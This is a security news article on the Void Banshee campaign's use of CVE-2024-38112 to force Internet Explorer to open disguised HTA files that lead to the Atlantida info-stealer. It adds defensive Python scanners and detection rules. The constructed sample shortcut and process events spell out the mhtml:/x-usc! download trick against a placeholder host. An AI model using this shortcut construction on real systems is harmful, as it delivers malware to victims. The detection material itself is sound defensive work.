Security researchers have uncovered a sophisticated attack campaign run by the advanced persistent threat (APT) group Void Banshee. The group exploited a Windows zero-day vulnerability, CVE-2024-38112, to run malicious code through the retired Internet Explorer browser, whose MSHTML engine still ships as part of Windows.
Understanding CVE-2024-38112
CVE-2024-38112 is classified as a Windows MSHTML Platform Spoofing Vulnerability with a CVSS score of 7.5 (high severity; Microsoft rates it Important rather than Critical). The flaw lets a specially crafted file cause Windows to open a URL in Internet Explorer instead of the default browser, and from there the attacker can get code executed on the machine. Exploitation is not automatic: the threat actor must convince the victim to open the crafted file.
Trend Micro's Zero Day Initiative detected active exploitation of this zero-day in May 2024 and reported it to Microsoft, which fixed the vulnerability in its July 2024 Patch Tuesday security updates.
Void Banshee’s Attack Methodology
The attack chain begins with social engineering. Victims are lured into opening zip archives containing malicious files disguised as PDF copies of books. The archives are distributed through cloud-sharing sites, Discord servers, and online libraries.
Void Banshee's targets are concentrated in North America, Europe, and Southeast Asia, a broad geographical footprint for a single group.
Exploiting Internet Explorer’s Lingering Presence
Internet Explorer 11 is retired and disabled on current Windows 10 and Windows 11 releases, but its MSHTML (Trident) engine remains in the operating system for compatibility reasons. Void Banshee's shortcut (.URL) files carry a URL of the form mhtml:<url>!x-usc:<url>: the mhtml: protocol handler and the x-usc! directive cause Windows to hand the URL to Internet Explorer rather than to the default browser, and IE then downloads an HTML Application (HTA) file, disguised as a PDF, that the user is prompted to open. The same mhtml/x-usc! construction was used in 2021 to exploit an earlier MSHTML flaw, CVE-2021-40444.
The technique is particularly concerning because the retired Internet Explorer application receives no further browser hardening, yet its engine can still be reached from a shortcut file and will happily run an HTA.
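The mhtml/x-usc! construction above is a string pattern, so it can be hunted for statically. The following is an added example, not code from the page or from Trend Micro: a small scanner that parses Internet shortcut (.url) files, flags URL= values that use the mhtml: handler or the x-usc: directive or reference an .hta file, and separately flags HTA file names padded with whitespace so that the real extension falls out of view in a file dialog. The sample shortcuts are constructed, the host names are placeholders, and the padding check is my own heuristic.

```python
import re
from pathlib import Path

# Added example (not from the page or Trend Micro). Hosts and samples below are constructed.

MHTML_RE = re.compile(r"^mhtml:", re.IGNORECASE)           # mhtml: protocol handler
XUSC_RE = re.compile(r"!x-usc:", re.IGNORECASE)            # x-usc! directive
HTA_RE = re.compile(r"\.hta(?![a-z0-9])", re.IGNORECASE)   # URL references an HTA
# "Books.pdf<many spaces or invisible characters>.hta": padding pushes the real
# extension out of the visible part of a dialog. Heuristic, not a page-stated rule.
PADDED_NAME_RE = re.compile(
    r"\.(pdf|docx?|xlsx?|txt)[\s\u00a0\u2000-\u200b\u3000]{5,}\.hta$", re.IGNORECASE
)


def parse_url_file(text):
    """Parse the INI-style text of an Internet shortcut.

    Returns the key/value pairs of the [InternetShortcut] section with keys
    lower-cased. Other sections (e.g. the GUID section Windows appends) are ignored.
    """
    section = None
    fields = {}
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields


def assess_shortcut(fields):
    """Return a list of findings for a parsed shortcut; an empty list means nothing matched."""
    findings = []
    url = fields.get("url", "")
    if MHTML_RE.match(url):
        findings.append("mhtml: handler in URL")
    if XUSC_RE.search(url):
        findings.append("x-usc: directive (hands the URL to Internet Explorer)")
    if HTA_RE.search(url):
        findings.append("URL references an .hta file")
    return findings


def is_padded_hta_name(name):
    """True for names like 'Books.pdf<120 spaces>.hta' that hide the HTA extension."""
    return PADDED_NAME_RE.search(name) is not None


def scan_directory(root):
    """Walk a directory tree and return {path: findings} for suspicious .url files."""
    results = {}
    for path in Path(root).rglob("*.url"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        findings = assess_shortcut(parse_url_file(text))
        if findings:
            results[str(path)] = findings
    return results


# Constructed samples (not real campaign artefacts); hosts are placeholders.
BENIGN_SHORTCUT = "[InternetShortcut]\r\nURL=https://example.com/docs/\r\n"
SUSPICIOUS_SHORTCUT = (
    "[InternetShortcut]\r\n"
    "URL=mhtml:http://files.example.invalid/Books.pdf"
    "!x-usc:http://files.example.invalid/Books.pdf\r\n"
    "[{000214A0-0000-0000-C000-000000000046}]\r\n"
    "Prop3=19,11\r\n"
)

if __name__ == "__main__":
    for label, text in (("benign", BENIGN_SHORTCUT), ("suspicious", SUSPICIOUS_SHORTCUT)):
        print(label, assess_shortcut(parse_url_file(text)) or "clean")
    print("padded name:", is_padded_hta_name("Books.pdf" + " " * 120 + ".hta"))
```

Run scan_directory() against a Downloads folder or a mail quarantine to triage .url files in bulk; a legitimate shortcut has no business starting with mhtml:, so every hit deserves a look.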
The Infection Chain
- A malicious Internet shortcut (.url) file sends the victim to an attacker-controlled domain, opened in Internet Explorer rather than the default browser.
- An HTML file on that site downloads the HTA stage of the infection chain.
- The HTA file, disguised as a PDF, is executed and runs a series of malicious scripts.
- Those scripts deploy the LoadToBadXml .NET trojan loader, which uses Donut shellcode to load the final payload, the Atlantida info-stealer, on the victim's system.
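The chain above also leaves a process-lineage trail that endpoint telemetry can catch. The following is an added example, not code from the page or from Trend Micro: two small detection rules run over constructed process-creation events. The lineage they look for (iexplore.exe started with an mhtml:...!x-usc: URL, then mshta.exe spawned by iexplore.exe to host the downloaded HTA) is an assumption drawn from the chain described above; the event field names are my own Sysmon-like shape, and the paths and hosts are placeholders.

```python
import json

# Added example (not from the page or Trend Micro). Field names, paths and hosts are
# constructed; the iexplore.exe -> mshta.exe lineage is an assumption about this chain.


def _image_is(event, field, exe):
    """True if the given image field ends with \\<exe>, case-insensitively."""
    return event.get(field, "").lower().endswith("\\" + exe)


def is_ie_forced_by_mhtml(event):
    """iexplore.exe started with an mhtml:...!x-usc: URL on its command line."""
    cmd = event.get("command_line", "").lower()
    return _image_is(event, "image", "iexplore.exe") and "mhtml:" in cmd and "!x-usc:" in cmd


def is_hta_from_ie(event):
    """mshta.exe whose parent is iexplore.exe: IE handed a downloaded HTA to the script host."""
    return _image_is(event, "image", "mshta.exe") and _image_is(event, "parent_image", "iexplore.exe")


def detect(events):
    """Return (rule_name, event) pairs for every event matching either rule."""
    hits = []
    for ev in events:
        if is_ie_forced_by_mhtml(ev):
            hits.append(("ie_launched_via_mhtml_xusc", ev))
        if is_hta_from_ie(ev):
            hits.append(("mshta_child_of_iexplore", ev))
    return hits


def load_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


# Constructed NDJSON events (raw string so the JSON-escaped backslashes survive).
SAMPLE_EVENTS = r"""
{"pid": 3004, "image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "msedge.exe https://example.com/"}
{"pid": 4120, "image": "C:\\Program Files\\Internet Explorer\\iexplore.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" mhtml:http://files.example.invalid/Books.pdf!x-usc:http://files.example.invalid/Books.pdf"}
{"pid": 4188, "image": "C:\\Windows\\System32\\mshta.exe", "parent_image": "C:\\Program Files\\Internet Explorer\\iexplore.exe", "command_line": "\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Users\\victim\\AppData\\Local\\Temp\\Books.pdf                    .hta\""}
"""

if __name__ == "__main__":
    for rule, ev in detect(load_events(SAMPLE_EVENTS)):
        print(rule, "pid", ev["pid"], "->", ev["command_line"])
```

Either rule alone is a strong signal on a fleet where Internet Explorer is retired: iexplore.exe should not be starting at all, and mshta.exe should not have it as a parent.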
Atlantida Info-Stealer: A Potent Threat
The final payload of this attack is the Atlantida info-stealer, which is designed to:
- Gather detailed system information
- Steal sensitive data, including passwords and cookies
- Target multiple applications for data exfiltration
Implications for Cybersecurity
This zero-day attack is a stark reminder that unsupported Windows components can be overlooked attack vectors. Even a disabled component like Internet Explorer can be reached by skilled threat actors and used to deploy ransomware, backdoors, or other malicious payloads.
Trend Micro researchers emphasize the severity of the situation: “The ability of APT groups like Void Banshee to exploit disabled services such as IE poses a significant threat to organizations worldwide. Since services such as IE have a large attack surface and no longer receive patches, it represents a serious security concern to Windows users.”
Protective Measures
To reduce exposure to this zero-day and similar vulnerabilities:
- Apply the July 2024 Microsoft security updates, which address CVE-2024-38112, and keep patching promptly thereafter
- Block or quarantine Internet shortcut (.url) and HTA files at mail and web gateways; neither is something users normally need to receive from outside the organization
- Educate users about the dangers of opening unexpected attachments, links, and "PDF" files that arrive inside archives
- Disable or remove unused components and protocols, including the Internet Explorer 11 optional feature on Windows 10 where no legacy application still needs it, bearing in mind that the MSHTML engine itself remains a system component
- Employ endpoint protection and telemetry that can flag script hosts such as mshta.exe being spawned by an unexpected parent process